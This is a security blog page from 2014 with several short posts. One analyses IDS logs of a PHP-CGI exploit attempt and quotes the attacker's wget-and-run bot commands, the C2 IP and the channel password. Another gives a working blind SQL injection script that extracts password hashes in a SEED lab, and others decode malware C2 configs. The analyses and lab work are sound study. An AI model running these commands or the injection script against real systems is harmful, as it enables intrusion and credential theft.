Monday, April 28, 2014

US Cyber Challenge Scoreboard Analysis

Prior to the competition closing on April 31, 2014 for the latest US Cyber Challenge located at http://uscc.cyberquests.org I thought I would do a quick analysis on the users of those who appear on the scoreboards.

Looking at the number of times the same user appears:

Appearances
User
7 jt
6 baldwintm
6 thepcnerd
5 devnull
5 jgbrigden
5 jimkoz23
5 jmoore
5 linuz
5 ltomczak
5 mkaplan
5 sonken
5 webdevgirl
5 wiredaemon
Only displaying the top 13 with 5 or more appearances on the scoreboards.

Another way to look at the numbers is below.  The number of appearances of the users that have appeared 7 times, 6 times, etc.

Number of Users Total Appearances
1 7 times
2 6 times
10 5 times
15 4 times
25 3 times
100 2 times
909 1 time

I am a fan of the US Cyber Challenges and congratulate those who support it, fund it, and promote it.  Keep the challenges coming.

Saturday, April 26, 2014

Examining IDS Logs for PHP-CGI Query String Vulnerabilities

I noticed a few high severity events related to PHP-CGI Query String vulnerabilities going through the IDS and bouncing off of the webserver.

The first item was identifying it in the IDS as one of the below events:
ET Web_Specific_Apps PHP-CGI query string parameter vulnerability - CVE2012-1823

I am not necessarily going to focus on the exploit.  I want to focus on the information in the below screenshot:

As you can see part of the vulnerability is to execute the following commands through php:
cd /tmp - Change to the /tmp directory
wget http://www.macam-informasi.com/bibah/bot.txt - Download using wget the bot.txt
perl bot.txt  - Use perl and execute the text file bot.txt that was previously downloaded
rm -rf bot.txt - Remove the bot.txt if in the process of execution perl bot.txt terminates
rm -rf bot.txt* - Remove anything that starts with bot.txt possibly due to temporary files that are created
rm -rf *.txt - Remove any temporary *.txt files that were created
rm -rf * - Remove any files int eh /tmp directory 

What if we submit the URL that is downloading bot.txt to virustotal?

What if we submit the file that is downloaded to virustotal?

Looking closer at the IRC bot that is executed:

As we can see from the first few lines the IRC channel that it connects to is #total, at IP Address 204.44.120.36, and later you find that the connection occurs over port 80.

Searching for the IP Address of 204.44.120.36 on arin.net we find:

I have a virtual machine that I am going to execute this bot.txt from and then capture the traffic going to this IRC channel:

As shown in the packet capture it joins the IRC channel of #total with probably a password of "muietie".  It is also observed the below DNS name is used for the IRC server:

If you log in manually to the IRC channel with the password that was captured:
You can see that 244 people are in the room or these are the servers that have been infected with the PHP-CGI vulnerability.

Looking closer at my connection in the room and checking the info it displays additional information about the connection:

From the channel they can interact with the Perl bot through the IRC channel commands.  This would allow them to remotely control the server.  They would also understand that the server that is in the list is vulnerable to the PHP-CGI vulnerability and could exploit it in the future.

I have sent an email to the ISP to report this activity but wanted to document an instance of this that has been observed through checking the IDS logs.

Here is the email back from their abuse department:

abuse-ticket@quadranet.com


to me
Your abuse report has been submitted to our Abuse Department.

Our typical reaction time is 72 hours. If your abuse issue isn't handled within 96 hours please respond to this message.


Abuse Ticket Number: 881046











Thursday, April 24, 2014

Python Raw Socket to Create ICMP Packet

Had a challenge to recreate a raw packet from bytes given in a text file.  Used python to create the raw socket.  The commented code is taking it from text to hex.

#!/usr/bin/env python

import socket
import struct

rawSocket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x800))
rawSocket.bind(("vmnet1", socket.htons(0x0800)))


#hexBytes = "000c29213dd1005056c00001080045000054b40a00004001905c0a0a112d0a0a11020000364e16070001c3190152013b030008090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637"

#counter = 1
#for letter in hexBytes:
# if counter == 1:
# firstLetter = letter
# counter = 2
# elif counter == 2:
# print "\\x" + firstLetter + letter
# counter = 1

hexPacket = "\x00\x0c\x29\x21\x3d\xd1\x00\x50\x56\xc0\x00\x01\x08\x00\x45\x00\x00\x54\xb4\x0a\x00\x00\x40\x01\x90\x5c\x0a\x0a\x11\x2d\x0a\x0a\x11\x02\x00\x00\x36\x4e\x16\x07\x00\x01\xc3\x19\x01\x52\x01\x3b\x03\x00\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37"

rawSocket.send(hexPacket)

Sunday, April 20, 2014

SQL Injection Script written for SEED Labs

SEED Labs are located here: http://www.cis.syr.edu/~wedu/seed/
These are great labs to learn more about cyber security and penetration testing.

The below script was developed to demonstrate SQL Injection on the phpBB lab that they provide.  Though the lab itself does not require this it was a great script to write.  With the script I extract the passwords for the 5 users that are found on the system.

This script could be made more efficient with instead brute forcing each letter to making them conditional statements.

#!/usr/bin/env python

import os
import re
from socket import *
from time import ctime

BUFSIZE=1024

# Change the hostInput based on your IP Address of the SEED Installation of Ubuntu 9.
hostInput = '172.16.108.140'

userNames = ['admin', 'alice', 'bob', 'carol', 'ted'] 
#userNames = ['ted'] 

userPassword = ''
contentLength = 63

for userName in userNames:
for number in range(1,30):
contentLengthTotal = contentLength + number

for letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
tcpServerSocket = socket(AF_INET, SOCK_STREAM)
remoteServer = (hostInput, 80)
tcpServerSocket.connect(remoteServer)

searchRequest1 = "POST http://www.sqllabmysqlphpbb.com/search.php?mode=searchuser HTTP/1.1\n"
searchRequest2 = "Host: www.sqllabmysqlphpbb.com\n"
searchRequest3 = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1\n"
searchRequest5 = "Accept-Language: en-US,en;q=0.5\n"
searchRequest6 = "Content-Type: application/x-www-form-urlencoded\n"
searchRequest7 = "Content-Length: " + str(contentLengthTotal) + "\n\n"
searchRequest8 = "search_username=4%27+OR+user_password+LIKE+%27" + userPassword + letter + "%25&search=Search\n\n\n"

searchRequest = searchRequest1 + searchRequest2 + searchRequest3 + searchRequest5 + searchRequest6 + searchRequest7 + searchRequest8

#print searchRequest

tcpServerSocket.send(searchRequest)
f = open('/tmp/output', 'w')
initialLength = 0

while True:
pageReturned = tcpServerSocket.recv(BUFSIZE)
if not pageReturned:
break
#print pageReturned
initialLength = initialLength + 1
f.write(pageReturned)
if initialLength == 14:  
break

f.closed
tcpServerSocket.close()

f = open('/tmp/output', 'r')
userNameInFile = '<option value="' + userName + '">'
for line in f:
if userNameInFile in line:
userPassword = userPassword + letter 
f.closed

print "The hash stored as the password for " + userName + " is " + userPassword
userPassword = ''
contentLength = 63



ASCII to Hex Encoder Another Version of a Previous Encoder

#!/bin/bash

# Usage: ./script-name <ASCII FILE> | tr -d '\n' > <ENCODED FILE>
# Take a file as the input

testInput=$1

function encode {

    case ${1} in
        "") echo "\x20" ;; "!") echo "\x21" ;; "\"") echo "\x22" ;;
        "#") echo "\x23"    ;; "$") echo "\x24" ;; "&") echo "\x26" ;;
        "%") echo "\x25"    ;; "'") echo "\x27" ;; "(") echo "\x28" ;;
        ")") echo "\x29" ;; '*') echo '\x2a' ;; '+') echo '\x2b' ;; 
        ',') echo '\x2c' ;; '-') echo '\x2d' ;; '.') echo '\x2e' ;; 
        "/") echo '\x2f' ;; '0') echo '\x30' ;; '1') echo '\x31' ;; 
        '2') echo '\x32' ;; '3') echo '\x33' ;; '4') echo '\x34' ;; 
        '5') echo '\x35' ;; '6') echo '\x36' ;; '7') echo '\x37' ;; 
        '8') echo '\x38' ;; '9') echo '\x39' ;; ':') echo '\x3a' ;; 
        ';') echo '\x3b' ;; '<') echo '\x3c' ;; '=') echo '\x3d' ;; 
        '>') echo '\x3e' ;; '?') echo '\x3f' ;; '@') echo '\x40' ;;
        'A') echo '\x41' ;; 'B') echo '\x42' ;; 'C') echo '\x43' ;; 
        'D') echo '\x44' ;; 'E') echo '\x45' ;; 'F') echo '\x46' ;; 
        'G') echo '\x47' ;; 'H') echo '\x48' ;; 'I') echo '\x49' ;; 
        'J') echo '\x4a' ;; 'K') echo '\x4b' ;; 'L') echo '\x4c' ;; 
        'M') echo '\x4d' ;; 'N') echo '\x4e' ;; 'O') echo '\x4f' ;; 
        'P') echo '\x50' ;; 'Q') echo '\x51' ;; 'R') echo '\x52' ;; 
        'S') echo '\x53' ;; 'T') echo '\x54' ;; 'U') echo '\x55' ;; 
        'V') echo '\x56' ;; 'W') echo '\x57' ;; 'X') echo '\x58' ;; 
        'Y') echo '\x59' ;; 'Z') echo '\x5a' ;; '[') echo '\x5b' ;; 
        '\\') echo '\x5c' ;; ']') echo '\x5d' ;; '^') echo '\x5e' ;; 
        '_') echo '\x5f' ;; '`') echo '\x60' ;; 'a') echo '\x61' ;; 
        'b') echo '\x62' ;; 'c') echo '\x63' ;; 'd') echo '\x64' ;; 
        'e') echo '\x65' ;; 'f') echo '\x66' ;; 'g') echo '\x67' ;; 
        'h') echo '\x68' ;; 'i') echo '\x69' ;; 'j') echo '\x6a' ;; 
        'k') echo '\x6b' ;; 'l') echo '\x6c' ;; 'm') echo '\x6d' ;; 
        'n') echo '\x6e' ;; 'o') echo '\x6f' ;; 'p') echo '\x70' ;; 
        'q') echo '\x71' ;; 'r') echo '\x72' ;; 's') echo '\x73' ;; 
        't') echo '\x74' ;; 'u') echo '\x75' ;; 'v') echo '\x76' ;; 
        'w') echo '\x77' ;; 'x') echo '\x78' ;; 'y') echo '\x79' ;; 
        'z') echo '\x7a' ;; '{') echo '\x7b' ;; '|') echo '\x7c' ;; 
        '}') echo '\x7d' ;; '~') echo '\x7e' ;;
        *) echo $1 ;;
    esac

}

while read line
do


    for (( c=0; c<${#line}; c++ ))
    do
        encode ${line:$c:1} 
    done

    echo "\x0a"


done < $testInput

echo "\n"

Saturday, April 19, 2014

Python - XOR a File

Origin of this script is from http://stackoverflow.com/questions/5037762/xor-each-byte-with-0x71

#!/usr/bin/python

file = bytearray(open("file.txt", "r").read())
for i in range(len(file)):
file[i] ^= 0x71

open("xorFile.txt", "wb").write(file)

Python Parser for CaptureBAT Output

From the command line where CaptureBAT is running I use the following syntax:
"CaptureBAT.exe -c -n -l outputCaptureBat.log"

Then copy the log file where the python script is located.

#!/usr/bin/python

import sys

def parseFile(file, filter, specific):
duplicate3rdItem=""
duplicate4thItem=""

for line in file:
items=line.split(',')
if items[1] == filter and items[2] == specific:
# Find the duplicates and remove them
if items[3] != duplicate3rdItem and items[4] != duplicate4thItem:
print items[0] + " " + items[3] + " " + items[4].rstrip()
duplicate3rdItem=items[3]
duplicate4thItem=items[4]


if len(sys.argv) >= 2:
outputFile='outputCaptureBat.log'
parseValues = [ ['"file"', '"Write"', 'Files Written'], ['"file"', '"Delete"', 'Files Deleted'],
               ['"process"', '"Created"', 'Processes Created'], ['"process"', '"terminated"', 'Processes Terminated'],
                ['"registry"', '"DeleteValueKey"', 'Registry Deleted Value'], ['"registry"', '"SetValueKey"', 'SetValueKey'] ]
for item in parseValues:
print "\n" + item[2]
print "-----------------------------------------------------------------------------------------------"
file = open(outputFile, "r")
parseFile(file, item[0], item[1])
else:
print "Usage: ./script outputCaptureBat.log"

Wednesday, April 16, 2014

Python - base64 Decode and XOR brute force Config File Leading to C2 Server


This script is the same as the below one however it brute forces the XOR key that is used verses knowing that the XOR key is 0xe8.

#!/usr/bin/python

# Malware found on virus total
# Modified variant of the Project Hook point-of-sale malware
# Fetches an obfuscated file containing additional C&C domains:
# http://www.localhost0x2.net/config/config_01.bin
# File content is XOR'ed using 0xE8, then Base64 encoded.

# Original File Content - config_01.bin
# gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2c
# gJycmNLHx4Sdi4ORxYydhZibxoqBkg==

import base64

# Take the base64 given and decode it and add it to a list
base64info = "gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2cgJycmNLHx4Sdi4ORxYydhZibxoqBkg=="
decodedInfo = base64.b64decode(base64info)
infoDecoded = decodedInfo.encode("hex")

# Take the list and make the values of the list a hex number as a string
info = []
counter = 1
for letter in infoDecoded:
    if (counter == 1):
        listItem = '0x' + letter
        counter = 2
    elif (counter == 2):
        listItem = listItem + letter
        info.append(listItem)
        counter = 1



#xorKey = 0xe8
# Redesigned to brute force the xorKey
for xorValue in range(0,256):
    # Define the new list of where the hex will go after XORed with the xorKey
    newInfo = []
    xorKey = hex(xorValue)
    #print xorKey
    for counter in range(0,len(info)):
        # Append to the list and remove from the hex 0x68 so it is represented as 68 in the list
        #newInfo.append(hex(int(info[counter], 16) ^ int(xorKey))[2:])
        newInfo.append(hex(int(info[counter], 16) ^ int(xorKey, 16))[2:])

    # Print the list joined together as a string and then decode the hex to ascii
    #print str(hex(xorKey)) + ' ' + ''.join(e for e in newInfo).decode("hex")
    try:
        if xorValue <> 144 | xorValue <> 145:
            print str(xorKey) + ' ' + ''.join(e for e in newInfo).decode("hex")
    except IOError:
        print str(xorKey) + ' Failed to decode Hex'
    finally:
        print str(xorKey) + ' Failed to decode Hex'

Tuesday, April 15, 2014

Python - base64 Decode and XOR with 0xe8 Config File Leading to C2 Server

#!/usr/bin/python

# Malware found on virus total
# Modified variant of the Project Hook point-of-sale malware
# Fetches an obfuscated file containing additional C&C domains:
# http://www.localhost0x2.net/config/config_01.bin
# File content is XOR'ed using 0xE8, then Base64 encoded.

# Original File Content - config_01.bin
# gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2c
# gJycmNLHx4Sdi4ORxYydhZibxoqBkg==

import base64

# Take the base64 given and decode it and add it to a list
base64info = "gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2cgJycmNLHx4Sdi4ORxYydhZibxoqBkg=="
decodedInfo = base64.b64decode(base64info)
infoDecoded = decodedInfo.encode("hex")

# Take the list and make the values of the list a hex number as a string
info = []
counter = 1
for letter in infoDecoded:
    if (counter == 1):
        listItem = '0x' + letter
        counter = 2
    elif (counter == 2):
        listItem = listItem + letter
        info.append(listItem)
        counter = 1


# Define the new list of where the hex will go after XORed with the xorKey
newInfo = []

xorKey = 0xe8

for counter in range(0,len(info)):
    # Append to the list and remove from the hex 0x68 so it is represented as 68 in the list
    newInfo.append(hex(int(info[counter], 16) ^ int(xorKey))[2:])

# Print the list joined together as a string and then decode the hex to ascii
print ''.join(e for e in newInfo).decode("hex")

Monday, April 7, 2014

Rewrite of Unquoted Path Vulnerability Script

$hash = @{
"FullPath" = "ServiceValue"}
$hash.keys | % {
    $name = $hash.Item($_)
    if(Test-Path ("hklm:\SYSTEM\CurrentControlSet\Services\" + $name)){
        $info = (Get-ItemProperty ("hklm:\SYSTEM\CurrentControlSet\Services\" + $name) -Name ImagePath -EA "SilentlyContinue").ImagePath
        #Check for quotes
        if ($info -eq "`"$_`""){
            #For testing: Write-Host "Has quotes!" $name $info
        }
        #Check for no quotes
        elseif ($info -eq $_){
            Write-Host "NO QUOTES!" $info #For Testing
            Set-ItemProperty ("hklm:\SYSTEM\CurrentControlSet\Services\" + $name) -Name ImagePath -Value "`"$_`""
        }
    }
}

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...